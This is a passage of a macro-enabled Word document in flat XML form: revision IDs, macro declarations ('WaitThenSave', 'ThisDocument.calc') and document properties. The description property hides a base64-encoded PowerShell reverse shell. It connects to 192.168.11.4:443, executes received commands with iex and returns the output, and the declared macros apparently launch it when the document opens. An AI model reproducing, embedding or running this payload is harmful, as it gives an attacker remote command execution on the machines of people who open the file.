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4A0E1E" w:rsidRDefault="004A0E1E"/>
    <w:sectPr w:rsidR="004A0E1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E67CE"/>
    <w:rsid w:val="00033CB9"/>
    <w:rsid w:val="000341A6"/>
    <w:rsid w:val="000A6620"/>
    <w:rsid w:val="000B21D5"/>
    <w:rsid w:val="000C0056"/>
    <w:rsid w:val="001001DE"/>
    <w:rsid w:val="00115E6A"/>
    <w:rsid w:val="00140C93"/>
    <w:rsid w:val="0015764C"/>
    <w:rsid w:val="00161A50"/>
    <w:rsid w:val="00172C1B"/>
    <w:rsid w:val="00185926"/>
    <w:rsid w:val="001A07EA"/>
    <w:rsid w:val="001B35FA"/>
    <w:rsid w:val="001C06DC"/>
    <w:rsid w:val="001D4124"/>
    <w:rsid w:val="00230452"/>
    <w:rsid w:val="002C03E4"/>
    <w:rsid w:val="002E7C6D"/>
    <w:rsid w:val="00322C29"/>
    <w:rsid w:val="00372D0D"/>
    <w:rsid w:val="003F26AB"/>
    <w:rsid w:val="003F4FEF"/>
    <w:rsid w:val="004115F2"/>
    <w:rsid w:val="0041765F"/>
    <w:rsid w:val="00472AAF"/>
    <w:rsid w:val="004926A2"/>
    <w:rsid w:val="004A0E1E"/>
    <w:rsid w:val="004C109B"/>
    <w:rsid w:val="004C477B"/>
    <w:rsid w:val="004D6F7A"/>
    <w:rsid w:val="004D7034"/>
    <w:rsid w:val="004E67CE"/>
    <w:rsid w:val="00502562"/>
    <w:rsid w:val="0054068E"/>
    <w:rsid w:val="00563720"/>
    <w:rsid w:val="005B12D9"/>
    <w:rsid w:val="005B683A"/>
    <w:rsid w:val="005D6356"/>
    <w:rsid w:val="005E6B25"/>
    <w:rsid w:val="005F16C3"/>
    <w:rsid w:val="00611210"/>
    <w:rsid w:val="006245B1"/>
    <w:rsid w:val="006316FA"/>
    <w:rsid w:val="0064589D"/>
    <w:rsid w:val="00751006"/>
    <w:rsid w:val="00751877"/>
    <w:rsid w:val="00765478"/>
    <w:rsid w:val="0078083D"/>
    <w:rsid w:val="007A1153"/>
    <w:rsid w:val="007E57E6"/>
    <w:rsid w:val="00897C7E"/>
    <w:rsid w:val="008D2AA4"/>
    <w:rsid w:val="008D2F2D"/>
    <w:rsid w:val="00925780"/>
    <w:rsid w:val="00944F30"/>
    <w:rsid w:val="00997D34"/>
    <w:rsid w:val="009A17C4"/>
    <w:rsid w:val="009B1E2E"/>
    <w:rsid w:val="009D5E7F"/>
    <w:rsid w:val="009E13ED"/>
    <w:rsid w:val="009F77CA"/>
    <w:rsid w:val="00A03579"/>
    <w:rsid w:val="00A14BC0"/>
    <w:rsid w:val="00A64656"/>
    <w:rsid w:val="00AE18C9"/>
    <w:rsid w:val="00B03035"/>
    <w:rsid w:val="00B43253"/>
    <w:rsid w:val="00BE7AD3"/>
    <w:rsid w:val="00C0317B"/>
    <w:rsid w:val="00C066BC"/>
    <w:rsid w:val="00C11CEB"/>
    <w:rsid w:val="00C17615"/>
    <w:rsid w:val="00C42084"/>
    <w:rsid w:val="00C4731B"/>
    <w:rsid w:val="00C70C6C"/>
    <w:rsid w:val="00CA6AE5"/>
    <w:rsid w:val="00CB1830"/>
    <w:rsid w:val="00CD1AC1"/>
    <w:rsid w:val="00CE0C76"/>
    <w:rsid w:val="00D11F33"/>
    <w:rsid w:val="00D85E3A"/>
    <w:rsid w:val="00DC10B7"/>
    <w:rsid w:val="00DD6B3C"/>
    <w:rsid w:val="00E000A3"/>
    <w:rsid w:val="00E20957"/>
    <w:rsid w:val="00E57565"/>
    <w:rsid w:val="00E939B5"/>
    <w:rsid w:val="00EC45D6"/>
    <w:rsid w:val="00F67EDF"/>
    <w:rsid w:val="00F7734D"/>
    <w:rsid w:val="00F77572"/>
    <w:rsid w:val="00F95B55"/>
    <w:rsid w:val="00FA7989"/>
    <w:rsid w:val="00FC14B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PROJECT.MODULE1.WAITTHENSAVE" wne:name="Project.Module1.WaitThenSave" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.THISDOCUMENT.CALC" wne:name="Project.ThisDocument.cal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DocTemp.dotm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VAM</dc:creator>
  <cp:keywords/>
  <dc:description>JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADEAMQAuADQAJwAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkA
ZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQA
YgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMA
dAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMA
awAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMA
awAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==</dc:description>
  <cp:lastModifiedBy>VAM</cp:lastModifiedBy>
  <cp:revision>73</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-01T21:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-15T19:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>